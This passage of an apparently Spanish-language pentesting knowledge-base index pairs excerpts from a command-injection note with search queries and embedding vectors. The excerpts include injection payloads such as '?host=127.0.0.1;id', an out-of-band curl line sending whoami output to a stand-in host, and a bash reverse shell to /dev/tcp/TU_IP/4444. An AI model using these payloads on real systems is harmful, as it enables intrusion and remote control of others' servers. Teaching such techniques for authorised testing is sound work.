-0.03783, 0.01245, 0.01569, 0.05879, 0.03648, 0.04207, -0.06126, -0.03761, 0.08257, 0.02984, -0.00223, 0.02694, -0.01684, 0.03062, 0.02518, 0.01847, -0.04602, -0.04473, -0.03963, -0.01277, -0.05325, 0.00254, 0.0025, -0.04355, -0.08152, -0.00877, 0.06464, -0.07956, -0.02551, 0.02641, -0.01449, -0.08607, 0.00124, 0.00245, -0.03905, -0.08025, 0.08049, 0.04133, -0.06035, 0.03154, 0.01355]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "con quΓ© puedo verificar si un servidor estΓ‘ respondiendo", "v": [-0.15706, 0.20668, -0.26812, -0.04359, 0.00718, -0.03772, 0.05281, -0.15007, 0.02985, -0.17212, -0.10186, -0.08573, 0.01989, -0.10672, 0.10844, 0.14666, 0.13491, -0.00731, 0.13929, 0.06329, 0.12684, -0.11218, 0.0651, -0.09787, -0.00449, 0.09655, 0.00719, -0.02237, 0.04339, -0.09282, 0.01106, -0.08676, -0.00535, 0.03217, -0.04534, 0.05024, 0.00499, 0.14974, -0.02426, 0.08452, 0.05191, 0.02536, 0.02052, -0.05843, -0.02135, -0.0051, 0.06798, -0.13328, 0.02158, -0.02906, -0.03961, -0.08063, -0.12831, 0.00697, -0.12418, 0.05435, 0.07152, -0.03972, 0.18431, -0.05846, -0.09863, -0.03296, 0.03194, -0.00807, 0.06935, 0.01684, 0.01062, 0.00536, -0.02381, -0.07782, -0.12054, 0.05978, -0.0659, -0.06493, -0.03482, 0.03012, 0.01225, 0.01074, 0.06455, 0.06728, 0.07596, 0.05876, 0.00194, 0.05979, -0.07182, -0.05135, -0.08949, -0.09937, 0.01742, -0.03322, 0.00193, 0.12275, -0.06107, 0.06876, -0.0041, 0.01531, 0.05879, -0.01993, -0.01095, 0.07579, 0.1047, 0.01124, -0.05521, 0.0809, -0.01043, 0.07611, 0.06529, -0.08839, -0.00228, -0.05435, 0.06814, -0.07177, -0.13484, -0.05363, -0.03779, -0.07083, -0.04325, -0.02424, 0.07012, 0.08152, -0.0887, 0.02529, 0.04801, 0.00987, 0.08156, -0.04766, 0.08966, 0.01598, 0.01558, 0.02778, -0.01737, -0.06067, -0.02781, -0.0624, 0.01279, 0.02082, 0.0335, -0.05467, 0.01939, -0.03905, 0.02018, -0.0075, 0.00565, 0.01888, 0.07879, 0.00668, 0.00585, -0.0667, -0.11998, 0.01309, 0.03328, -0.03266, 0.02257, 0.07909, -0.04184, -0.0191, 0.04973, -0.06893, -0.02051, 0.04781, 0.05157, 0.04704, 0.03316, 0.09227, 0.01655, -0.00365, -0.01106, 0.02364, 0.02413, -0.00391, -0.04417, 0.0084, -0.01291, -0.0805, 0.0286, 0.02702, -0.06877, -0.02721, 0.00075, -0.02746, -0.07008, 0.01356, -0.06562, -0.02609, -0.07066, -0.01893, 0.02026, 0.00227, 0.00597, 0.05021, 0.06043, 0.02246, -0.01223, 0.02756, -0.00752, -0.03288, 0.02339, -0.03158, -0.05024, -0.03281, -0.02999, -0.00082, -0.05436, -0.05319, -0.01711, 0.00412, -0.03095, 0.0632, 0.03213, 0.00676, 0.0019, 0.0066, 0.11967, -0.06597, -0.05728, -0.02275, 0.03804, -0.00794, -0.02361, -0.00561, 0.04085, 0.03384, 0.01105, 0.02169, 0.03977, 0.0387, 0.0006, 0.0165, 0.07931, 0.06221, -0.05039, 0.02703, -0.03673, -0.00097, 0.02589, -0.00291, 0.03486, -0.053, -0.0209, -0.06633, 0.02577, 0.08268, -0.01531, -0.04591, 0.0277, -0.0397, -0.03188, -0.01425, -0.04241, -0.01721, -0.00084, -0.04371, 0.01849, -0.04593, 0.00788, -0.04576]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "cuΓ‘l es una herramienta para hacer pruebas de conexiΓ³n", "v": [-0.03218, 0.10897, -0.12789, -0.21497, 0.07251, -0.10561, -0.1022, 0.00116, 0.0515, -0.10621, -0.13113, -0.00111, -0.03506, -0.06063, 0.00569, 0.05363, 0.09208, -0.04847, -0.04214, -0.06345, -0.06624, -0.00284, -0.17405, -0.03312, -0.07403, 0.0381, 0.03639, 0.04808, -0.11695, -0.00098, -0.07096, 0.01341, 0.09208, 0.03195, -0.11983, -0.00313, 0.04897, 0.09731, 0.07653, 0.07363, -0.10723, -0.03175, -0.02866, 0.06629, 0.01571, 0.00276, 0.029, -0.00855, -0.02438, 0.07733, -0.05137, -0.09212, -0.07274, -0.07289, -0.06101, -0.18076, 0.10639, -0.14332, 0.04932, -0.07131, -0.08062, -0.08783, -0.04546, -0.03603, 0.01157, -0.06049, -0.00011, -0.0296, -0.08093, 0.09754, 0.02978, 0.00522, 0.00087, -0.0228, -0.09275, 0.00603, 0.12002, -0.00747, 0.02178, 0.01032, 0.08737, -0.00092, -0.02595, 0.00701, -0.07024, -0.02824, 0.03712, -0.03662, 0.06618, -0.09948, -0.00969, 0.05378, 0.01166, -0.01377, 0.02613, -0.04395, 0.04893, -0.14056, 0.00113, -0.09317, 0.17379, -0.01735, -0.10156, 0.06535, -0.11986, -0.08151, -0.04246, 0.05255, -0.10852, 0.00057, 0.10185, 0.01452, -0.04313, 0.02927, -0.0847, 0.07533, 0.01692, -0.08978, -0.11335, -0.06648, 0.04728, 0.04029, -0.1261, -0.0843, -0.01546, 0.0311, 0.06372, 0.02857, 0.00478, 0.01789, 0.02331, 0.03942, -0.09055, -0.00688, -0.00182, -0.01277, -0.01618, -0.17998, 0.01801, -0.08047, -0.00544, -0.02288, 0.00154, -0.08994, 0.01876, 0.03492, -0.06069, 0.0425, -0.07233, 0.01167, -0.05231, -0.05891, -0.06621, 0.0322, -0.0549, -0.01616, 0.02433, 0.06648, -0.05157, 0.03531, -0.03516, -0.08064, -0.0074, 0.02129, 0.08522, -0.01805, 0.0252, 0.00432, 0.02623, -0.00044, 0.05589, 0.00695, 0.0002, -0.01106, 0.08028, -0.00706, -0.04337, -0.03578, -0.08297, -0.12538, -0.01592, -0.01892, -0.04581, -0.04371, 0.11837, -0.01697, 0.07463, -0.0016, 0.05201, 0.07739, -0.03293, 0.01167, 0.05069, -0.00822, 0.11167, 0.0166, 0.08179, -0.05604, -0.01535, 0.01495, -0.05916, -0.1338, -0.00756, -0.03421, 0.00492, 0.06573, -0.02139, -0.04503, -0.0041, 0.01418, 0.02205, 0.03038, 0.07854, -0.06984, -0.02794, 0.02129, -0.02705, 0.01596, -0.03033, 0.00207, 0.0055, 0.00497, -0.00527, 0.02474, -0.03469, 0.0837, -0.03125, 0.0018, -0.03826, -0.0674, 0.06444, -0.04368, 0.04827, 0.01926, 0.00871, -0.07106, 0.00618, -0.01887, -0.01388, -0.03649, -0.03459, 0.04757, 0.00937, 0.00559, -0.03454, 0.00132, 0.0164, -0.0554, -0.03744, -0.05346, -0.03915, -0.04557, 0.07868, -0.01283, 0.03334, -0.00351]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Separadores a probar (en Burp Repeater e Intruder)\n```\n;id ejecuta tras el comando\n| id pipe\n& id / && id encadenado\n`id` $(id) sustituciΓ³n de comando\n%0a id newline (a veces evade filtros)\n```\nEjemplo: `?host=127.0.0.1;id` β†’ si ves `uid=...` en la respuesta, tienes RCE.", "indexar": "con quΓ© puedo ejecutar comandos desde Burp Repeater", "v": [0.03074, 0.05823, -0.02232, -0.02152, 0.07241, 0.03862, 0.20754, -0.01727, -0.09192, -0.14426, -0.17994, 0.12292, 0.08151, -0.099, 0.00171, 0.06778, -0.05604, 0.11824, 0.03237, -0.08805, 0.17004, -0.00027, 0.03469, 0.0439, 0.08802, 0.11388, 0.03551, 0.04487, -0.04604, -0.06351, -0.04527, 0.03922, 0.07069, -0.07499, -0.08913, 0.09794, -0.03777, 0.02069, -0.02923, 0.1388, -0.12403, 0.05152, -0.15403, 0.07056, 0.00281, -0.0186, 0.04726, -0.01074, 0.06305, -0.1157, -0.01298, -0.02015, -0.11421, -0.01488, -0.05293, -0.00495, 0.12321, -0.04906, 0.00712, -0.00264, -0.02555, -0.0353, 0.02195, 0.00379, 0.01694, -0.05901, -0.07252, -0.18643, 0.01984, 0.08895, -0.17803, 0.0596, -0.05229, 0.14057, 0.03943, -0.06177, -0.09225, -0.02562, 0.13376, 0.02599, -0.03643, -0.00901, -0.15291, 0.01711, 0.02062, -0.09386, -0.08538, -0.09954, -0.03948, -0.07198, 0.05093, -0.05511, 0.0758, 0.06049, 0.03299, 0.01338, 0.02338, 0.03631, -0.00729, -0.00241, 0.01407, -0.01039, -0.1034, 0.13161, 0.06024, 0.00533, -0.00827, 0.03198, 0.05602, -0.01235, 0.02304, -0.08508, -0.05084, -0.04913, -0.05317, -0.07076, -0.09294, -0.05211, 0.03692, -0.06048, -0.14418, 0.045, 0.01116, 0.07056, 0.02174, 0.00114, -0.02357, 0.02851, 0.08566, 0.03209, -0.04933, -0.00378, 0.12105, -0.10982, -0.02438, 0.08988, -0.01084, -0.03212, -0.06917, -0.12862, 0.00249, -0.00414, 0.01086, 0.03955, 0.02571, -0.02188, 0.03707, -0.07956, -0.01288, -0.04735, 0.13884, 0.02324, -0.07614, 0.04805, -0.02738, -0.03019, -0.04199, 0.00099, 0.03771, 0.06248, -0.02604, -0.00955, -0.08806, 0.02133, 0.05989, -0.01405, -0.04812, 0.00357, -0.04059, 0.06929, -0.00852, 0.03008, -0.00163, -0.04094, 0.03626, -0.06861, -0.02553, -0.0251, 0.0196, -0.00862, -0.03169, 0.09544, -0.05199, 0.00319, -0.00735, -0.08093, -0.01518, 0.04601, 0.0008, 0.00672, -0.04068, 0.08308, 0.03393, -0.07503, 0.02179, -0.00097, 0.00306, -0.01353, -0.10994, -0.03307, -0.05577, 0.00382, -0.01044, -0.06556, 0.01295, -0.00457, -0.01873, 0.09544, -0.02546, 0.01682, 0.01612, -0.01026, 0.0846, 0.00209, -0.0399, -0.01735, 0.01944, 0.0292, -0.05191, -0.00652, 0.01745, 0.04681, 0.08451, -0.02019, 0.02318, -0.02503, 0.00131, -0.02997, 0.01672, 0.01295, -0.00964, 0.01291, 0.00321, -0.04004, 0.01738, 0.00798, -0.02352, -0.00219, -0.01424, 0.02147, 0.01944, 0.01718, 0.00331, -0.0958, 0.01744, -0.03575, -0.08319, 0.0082, -0.02981, -0.00081, 0.00062, 0.02993, -0.01033, -0.0565, -0.06787, -0.04517]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Separadores a probar (en Burp Repeater e Intruder)\n```\n;id ejecuta tras el comando\n| id pipe\n& id / && id encadenado\n`id` $(id) sustituciΓ³n de comando\n%0a id newline (a veces evade filtros)\n```\nEjemplo: `?host=127.0.0.1;id` β†’ si ves `uid=...` en la respuesta, tienes RCE.", "indexar": "cΓ³mo puedo probar sustituciones de comandos con parΓ‘metros dinΓ‘micos", "v": [0.08765, 0.12016, -0.08696, -0.10152, 0.07954, -0.00718, 0.12545, -0.02744, -0.17814, -0.02957, 0.01647, 0.053, 0.04893, -0.1833, -0.09299, 0.11242, 0.11501, -0.06727, -0.13592, 0.0271, 0.09381, -0.17204, -0.09428, -0.01851, 0.05551, -0.01204, 0.09566, -0.03812, -0.13734, -0.09316, -0.01921, 0.04955, 0.05011, -0.09045, -0.06593, -0.01213, -0.10194, 0.00748, 0.01831, 0.10947, -0.05401, -0.08999, -0.01805, -0.01462, 0.01044, 0.01323, -0.09314, -0.06728, -0.07441, -0.07692, 0.03742, -0.01869, -0.03191, -0.00659, -0.07603, -0.05684, 0.16279, -0.05816, 0.00486, -0.01385, 0.09699, -0.08699, 0.06623, 0.10672, 0.02321, -0.02293, -0.02434, -0.09728, -0.038, 0.06363, -0.07193, 0.09837, -0.14601, 0.03921, 0.10733, 0.08393, 0.01167, -0.03253, 0.15967, -0.03683, -0.0658, 0.07185, -0.06145, 0.11295, -0.08313, -0.06038, -0.07281, -0.10084, -0.02324, -0.03856, 0.09441, -0.01543, 0.06085, 0.05006, -0.00609, 0.03356, 0.0097, 0.03982, 0.05707, -0.03227, -0.02186, 0.01476, -0.1493, 0.12867, -0.00425, 0.02947, 0.04352, -0.03912, 0.01878, -0.02464, -0.04469, -0.07702, -0.01095, -0.02763, -0.05215, -0.04264, -0.11426, -0.05903, -0.04051, -0.00751, -0.07226, 0.04896, -0.01058, 0.03908, 0.01656, -0.01645, 0.00419, -0.00338, 0.13319, 0.09559, -0.01655, 0.04496, 0.0486, -0.00295, -0.00578, 0.0888, 0.0037, 0.02904, -0.05368, -0.15727, -0.01825, 0.08368, 0.06756, -0.03344, 0.07913, -0.00716, 0.03088, -0.01589, -0.10448, 0.04488, 0.02626, 0.02364, -0.03758, 0.05496, -0.05771, -0.03792, -0.00408, -0.0851, -0.05481, -0.01939, -0.01605, 0.00875, -0.03536, 0.04614, 0.08522, -0.04991, -0.01565, -0.06215, -0.01834, 0.00862, -0.02409, 0.06033, 0.01359, -0.03651, 0.01871, 0.00616, -0.04595, -0.03387, 0.04112, -0.00569, -0.01218, 0.07431, -0.0797, -0.04929, -0.04849, -0.02634, -0.01092, -0.00511, 0.00868, -0.00522, 0.04799, 0.07208, -0.01618, -0.02468, 0.00819, -0.00736, 0.00122, -0.03734, -0.05323, -0.05785, -0.07075, 0.0033, -0.0161, -0.10733, 0.06863, 0.01017, -0.02713, 0.07212, -0.00205, -0.03326, 0.01305, -0.04644, 0.09127, 0.00097, -0.06713, -0.03645, 0.04256, -0.00732, -0.03761, -0.00366, 0.01275, 0.05664, 0.09924, -0.0251, 0.02332, -0.01509, -0.00043, 0.01537, 0.04571, 0.03738, 0.01241, 0.0294, -0.03456, -0.0297, 0.07351, 0.04703, 0.01101, -0.00632, -0.04757, -0.03534, 0.0503, 0.05714, -0.03786, -0.02664, -0.01361, -0.08157, -0.06287, 0.03041, -0.02611, -0.03057, -0.00066, 0.04541, 0.01845, -0.0821, -0.0085, -0.07404]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# out-of-band:\n?host=127.0.0.1; curl http://TU_IP/$(whoami) # mΓ­ralo en tu http.server\n```", "indexar": "que programa sirve para probar servidores HTTP localmente?", "v": [-0.01402, 0.03404, -0.16866, -0.20179, 0.03983, -0.15951, 0.08981, -0.10459, 0.05821, -0.02373, -0.13713, 0.0598, 0.07211, -0.09896, 0.04063, 0.0372, 0.13284, -0.13611, 0.06859, 0.00394, 0.03566, 0.04679, -0.0541, -0.0363, -0.07022, -0.04276, 0.05761, -0.02297, -0.07228, -0.04828, 0.04632, -0.08678, -0.02502, 0.05462, -0.06733, 0.0063, -0.03213, 0.10598, -0.03002, 0.10276, 0.11215, 0.01833, -0.03441, 0.00065, -0.07685, 0.04839, -0.00568, -0.11211, 0.02252, -0.08576, -0.07073, -0.00674, -0.11237, 0.02593, -0.0846, 0.10868, -0.02125, -0.1504, -0.03762, -0.01345, -0.09071, -0.06726, 0.00779, -0.03229, 0.08235, -0.05456, 0.02356, 0.01897, -0.15682, 0.01573, -0.09115, 0.08633, 0.05474, -0.10478, -0.00896, 0.05102, -0.0692, -0.02937, 0.07792, 0.01118, 0.0209, 0.01852, -0.02315, 0.09682, -0.15129, -0.05363, -0.01592, -0.05898, 0.06964, -0.02155, 0.09935, 0.12667, 0.00681, 0.06444, -0.0032, -0.06524, 0.20598, -0.0588, 0.07687, 0.02632, 0.06745, -0.02608, -0.056, 0.06119, -0.00161, 0.13033, 0.10294, 0.00845, 0.0234, -0.05563, 0.03634, -0.05336, -0.11861, 0.07283, -0.02971, -0.05979, 0.02272, -0.00691, 0.0269, -0.01515, -0.08263, -0.00575, -0.04356, 0.03772, 0.01425, 0.00595, 0.02453, 0.00991, -0.01262, 0.02874, 0.0314, -0.01571, -0.02995, 0.07156, -0.07601, -0.03433, 0.13612, -0.08427, -0.02129, 0.00904, -0.00928, 0.05449, -0.03196, 0.02725, 0.06056, 0.00531, 0.08819, -0.04339, -0.01882, 0.03617, -0.00976, -0.03279, -0.10323, 0.03035, -0.14947, -0.05679, 0.0196, -0.07348, -0.10102, 0.07228, 0.0249, 0.02678, 0.01914, 0.0822, 0.0413, 0.04283, -0.08092, 0.04921, 0.11949, 0.03382, -0.00905, 0.07246, -0.01066, -0.1378, -0.0416, -0.00054, -0.06055, -0.04123, 0.05877, -0.00129, -0.01179, 0.03947, 0.01397, 0.03856, -0.05396, -0.04205, -0.00016, 0.01348, -0.00125, 0.00823, 0.00601, -0.0148, -0.08468, 0.05764, 0.02919, 0.00889, -0.03085, -0.01125, -0.00267, -0.0248, -0.05391, -0.04534, -0.01731, -0.04529, -0.00597, 0.04859, -0.00476, 0.01611, -0.02342, 0.04951, -0.01789, -0.02929, 0.09671, -0.01772, 0.00103, -0.01313, 0.07178, -0.00032, -0.01489, 0.02506, -0.01925, -0.03434, 0.02595, 0.04631, 0.02045, -0.00647, 0.05517, -0.04927, 0.06153, -0.01989, -0.02892, 0.00777, -0.04355, -0.02356, 0.02065, -0.02091, 0.00558, 0.0099, -0.04527, -0.12019, -0.01027, 0.08681, -0.05655, -0.06381, -0.01126, -0.0794, -0.06448, -0.06036, -0.00362, 0.02125, -0.06136, 0.01264, 0.03684, -0.02296, -0.02262, 0.02915]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# out-of-band:\n?host=127.0.0.1; curl http://TU_IP/$(whoami) # mΓ­ralo en tu http.server\n```", "indexar": "cual es una alternativa libre a python http.server?", "v": [0.03742, -0.02991, -0.07884, -0.02389, -0.08313, -0.16451, -0.00318, -0.15075, -0.12813, 0.00148, -0.02458, -0.05958, -0.01008, 0.03565, -0.02921, -0.06802, 0.01706, -0.00408, 0.23171, -0.01666, -0.11648, 0.05514, -0.14329, -0.09269, 0.00148, 0.03218, 0.03005, -0.00792, -0.08752, -0.00389, 0.08583, -0.00311, 0.0484, 0.04143, -0.04012, 0.02287, 0.1906, 0.16597, 0.05225, 0.02167, -0.11135, -0.15189, -0.03139, 0.10571, -0.07185, -0.07657, -0.02677, 0.01582, 0.01676, 0.04118, -0.09417, -0.05332, -0.06913, -0.01316, 0.1094, 0.00133, 0.13164, -0.12702, 0.0749, 0.01697, -0.15392, -0.01261, -0.00414, -0.04357, 0.02503, 0.02529, -0.06194, -0.0499, -0.1559, 0.11489, 0.00257, -0.01332, 0.00366, 0.02429, -0.02076, 0.02603, -0.12053, -0.05409, -0.02185, 0.09614, 0.00912, -0.08223, -0.03027, 0.07246, -0.0481, -0.14938, 0.08464, -0.05136, 0.07898, 0.01795, 0.0581, 0.11688, -0.01082, 0.10087, -0.00969, -0.04882, 0.05107, 0.00666, 0.04734, 0.06672, 0.06212, 0.02326, -0.03203, 0.00453, 0.02719, 0.03004, -0.06717, 0.04961, -0.13516, -0.02905, 0.0717, -0.00011, -0.03006, 0.03262, -0.07392, -0.14192, -0.0618, 0.10973, -0.04259, 0.1042, -0.07475, 0.01967, -0.05749, -0.0009, -0.01824, 0.07136, 0.10767, 0.11967, -0.07256, 0.01958, 0.03822, -0.04988, -0.06956, -0.09057, -0.10095, 0.01226, 0.096, -0.0025, 0.03428, 0.01132, -0.06589, 0.05343, 0.02361, -0.01394, 0.06973, 0.01486, 0.04151, -0.08419, -0.04914, -0.04397, -0.02109, 0.0172, 0.0195, 0.06959, -0.09773, 0.00993, -0.09098, -0.02727, -0.06169, 0.06151, 0.06791, -0.00246, -2e-05, -0.02573, 0.02406, -0.0106, -0.00878, -0.01648, 0.00024, -0.00115, -0.00352, 0.05737, 0.02364, -0.07322, 0.05296, -0.08556, 0.02597, -0.1043, -0.01005, -0.03331, 0.04401, 0.00056, -0.12431, -0.01623, 0.04137, -0.03484, 0.03037, -0.00446, 0.01011, 0.02033, -0.00225, 0.02743, -0.09329, -0.03617, 0.02827, -0.00826, 0.02519, -0.05993, 0.04701, -0.04772, -0.05437, -0.05366, -0.05375, 0.00287, -0.00715, 0.0439, -0.04609, 0.00108, -0.01046, 0.03683, 0.07259, -0.00371, 0.0971, 0.00651, -0.00607, -0.03765, 0.01472, -0.00495, 0.02177, -0.03675, -0.01542, 0.0127, 0.03045, 0.01799, -0.0233, 0.05054, 0.06728, 0.0346, 0.02986, 0.00208, -0.06066, 0.00394, -0.02493, 0.01531, 0.00265, -0.00551, 0.02803, 0.01727, -0.01427, -0.01108, 0.01672, 0.08408, -0.03948, -0.06462, -0.04136, 0.01542, -0.05477, -0.03012, -0.05739, -0.03218, -0.03264, -0.00044, -0.0075, -0.0213, -0.01381, 0.03193]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# out-of-band:\n?host=127.0.0.1; curl http://TU_IP/$(whoami) # mΓ­ralo en tu http.server\n```", "indexar": "con que puedo ejecutar un servidor web simple sin instalar python?", "v": [0.09878, 0.05762, -0.20496, -0.16496, 0.02765, -0.16671, 0.02017, -0.12142, -0.03338, -0.03453, -0.09316, 0.05331, 0.03537, -0.08106, -0.01421, 0.03422, 0.08753, -0.11302, 0.08704, -0.0075, -0.0282, 0.02093, -0.02017, -0.04506, 0.00095, 0.15674, 0.03191, 0.0128, -0.1505, -0.09777, -0.00626, 0.04032, 0.062, 0.02357, -0.04187, -0.03954, 0.00285, 0.13137, -0.04611, 0.08029, -0.06156, 0.00761, -0.02835, 0.12005, -0.0773, -0.00345, 0.12785, -0.10837, 0.08556, -0.04706, -0.03355, -0.06688, -0.12667, -0.10778, -0.00877, -0.0079, 0.17199, -0.15232, 0.14156, 0.00824, -0.1498, 0.02811, -0.0056, 0.03636, 0.12084, 0.08262, -0.03772, -0.02839, -0.09822, 0.02614, -0.07643, 0.03403, -0.03254, -0.0089, 0.08893, 0.03171, -0.12086, -0.07732, 0.02437, 0.09541, 0.01612, -0.06773, -0.05087, 0.04319, -0.07256, -0.11487, -0.01891, -0.04184, 0.09543, -0.04344, 0.08027, 0.06506, -0.03042, 0.05513, 0.02806, -0.04214, 0.13574, -0.05936, 0.00407, 0.00345, 0.02528, -0.00998, 0.02136, 0.09234, 0.01534, 0.07201, 0.04996, 0.0084, -0.02304, -0.11061, 0.06835, -0.03619, -0.08554, -0.06361, -0.07429, -0.11676, -0.01801, 0.02414, -0.01736, 0.05051, -0.09538, -0.01634, -0.06034, 0.09432, -0.01308, -0.0372, 0.08221, 0.08517, -0.04384, -0.01673, -0.01839, -0.07107, 0.00128, -0.00886, -0.0456, 0.10773, 0.05558, -0.063, -0.01653, -0.06415, 0.01278, 0.02667, -0.04304, -0.00195, 0.09853, 0.01227, 0.03378, -0.07042, -0.0859, 0.00221, 0.08554, -0.02117, -0.06289, 0.05518, -0.1426, -0.02743, 0.00751, -0.02158, 0.03364, 0.01455, 0.04498, 0.04252, 0.03234, 7e-05, 0.02607, 0.00459, -0.09054, -0.01209, 0.08633, 0.05602, -0.00915, 0.06385, -0.02042, -0.06865, 0.05032, -0.0609, -0.04815, -0.03478, 0.02884, 0.03196, -0.01904, 0.01223, -0.02906, 0.00975, -0.04226, -0.01758, -0.0002, -0.00803, -0.06408, 0.01598, 0.04542, 0.04152, -0.10029, 0.02179, 0.07204, -0.02028, -0.01233, -0.01677, -0.01241, -0.04689, -0.02392, -0.02999, -0.02713, -0.04214, 0.03072, 0.04066, -0.0665, 0.04613, -0.02785, 0.04813, 0.01469, -0.02395, 0.07374, -0.04838, 0.01452, -0.0484, 0.06365, -0.01585, 0.024, 0.0066, -0.05023, 0.0202, 0.04999, 6e-05, 0.00877, -0.00149, 0.01621, -0.0133, 0.05403, 0.00605, -0.09647, 0.01834, -0.03609, -0.02967, 0.02981, -0.01962, 0.00902, -0.04543, -0.08161, -0.00195, 0.00175, 0.08134, -0.00244, -0.06881, -0.02196, -0.05711, -0.01912, -0.02282, -0.05069, -0.05641, -0.0121, -0.00575, 0.03872, -0.0468, -0.0354, 0.01757]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "que comando sirve para hacer un reverse shell desde el host", "v": [0.02728, -0.01506, -0.15977, -0.11126, -0.01645, -0.11622, -0.07435, -0.00094, 0.04951, -0.03228, -0.16447, -0.0653, 0.08049, -0.12993, 0.06523, 0.07267, 0.07503, 0.00319, 0.01467, 0.00289, -0.01073, 0.05628, 0.0975, -0.04492, 0.00963, 0.06544, 0.10639, 0.04167, -0.16308, -0.13842, -0.04119, -0.11428, 0.00179, -0.04951, -0.01449, 0.0711, -0.02597, -0.03278, -0.034, 0.21941, -0.08664, 0.03511, -0.12584, 0.09835, 0.01349, -0.02946, 0.05183, -0.07803, 0.07707, 0.02005, -0.06413, -0.14642, -0.11288, 0.03807, 0.03098, 0.03533, 0.05693, -0.16594, 0.00269, -0.10007, -0.11258, -0.08173, 0.00617, 0.11439, 0.07464, -0.01395, -0.12613, -0.11846, -0.08429, -0.06216, -0.10672, 0.05735, 0.0017, 0.03973, -0.06769, -0.0519, 0.01055, 0.06176, 0.04532, -0.0338, -0.09033, -0.01127, -0.11195, 0.09121, -0.00954, -0.05342, -0.03126, -0.07808, 0.00313, 0.03404, 0.01676, 0.05975, 0.06561, 0.03408, 0.04721, -0.07304, 0.02579, 0.09273, 0.01616, 0.01851, 0.06175, -0.05936, -0.01529, 0.16268, 0.07359, 0.0895, 0.03908, -0.01823, -0.0464, 0.12015, 0.00767, -0.0988, 0.02508, 0.05296, -0.0285, -0.10175, -0.0473, -0.06671, 0.05409, 0.00951, -0.1351, -0.06097, 0.00133, 0.10354, 0.01485, 0.02821, -0.03518, 0.02918, 0.12379, 0.02746, -0.03181, -0.00255, 0.05928, -0.01815, -0.05622, 0.10796, 0.04552, -0.00167, -0.06279, -0.04708, 0.00587, 0.18783, -0.01459, 0.00754, 0.00623, -0.05943, 0.11794, -0.09713, -0.04214, 0.03651, 0.02274, 0.09643, -0.04547, 0.01916, -0.03502, -0.04214, -0.01805, -0.06778, -0.02175, 0.02195, -0.04397, -0.06177, -0.03503, 0.07829, 0.05305, -0.04223, -0.0957, -0.00681, 0.02624, 0.02802, -0.07253, 0.06392, 0.02725, -0.0221, 0.04649, 0.00793, 0.03948, -0.02655, -0.00101, -0.00536, 0.07692, -0.0185, -0.04539, -0.01358, 0.01039, 0.02218, 0.03616, 0.06517, -0.01138, -0.00088, -0.02237, 0.07026, 0.00336, -0.0315, -0.01204, 0.01243, 0.0235, -0.056, 0.0145, 0.02202, -0.03611, 0.06001, 0.04956, -0.03956, 0.00197, -0.05429, -0.05841, 0.0512, 0.03329, -0.01109, -0.01665, 0.01773, 0.03821, 0.09003, -0.01042, 0.00868, 0.00097, 0.0047, -0.02939, 0.05686, -0.00477, -0.0194, -0.03938, 0.01388, 0.03207, -0.02437, -0.01304, -0.04686, 0.0637, -0.01001, -0.01333, 0.02764, 0.01703, 0.05407, -0.02308, -0.0338, 0.01027, -0.00244, 0.03395, -0.01175, -0.02273, 0.03287, -0.04222, -0.08101, 7e-05, -0.05629, -0.02689, 0.01284, -0.01018, -0.00577, -0.03823, 0.00473, 0.01654, 0.00447, -0.05319, -0.02946]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "con que puedo ejecutar una conexiΓ³n inversa a un puerto TCP", "v": [0.02732, 0.01147, -0.1963, 0.00513, 0.10451, -0.02689, 0.15705, 0.03052, -0.03578, -0.04399, -0.04212, 0.11958, 0.14124, 0.10466, -0.06505, 0.01117, 0.01578, 0.07082, 0.14883, -0.13852, -0.02727, -0.04093, -0.00314, -0.12491, 0.14379, 0.09006, -0.03775, 0.08645, -0.03858, -0.14385, -0.1139, -0.03888, 0.13745, 0.08971, -0.01452, -0.00976, -0.0175, 0.08588, 0.07307, 0.12432, 0.01433, 0.11487, -0.08234, 0.05617, 0.09284, -0.01538, 0.08872, -0.08381, 0.04176, -0.01514, -0.13029, 0.00442, -0.20292, -0.11248, -0.10898, 0.02819, 0.01297, -0.03445, 0.01465, -0.07428, -0.00978, 0.02101, -0.12243, -0.07063, 0.01297, -0.01177, -0.09001, 0.03038, -0.03783, 0.06724, -0.07727, 0.04507, -0.02071, 0.01205, 0.09633, -0.115, 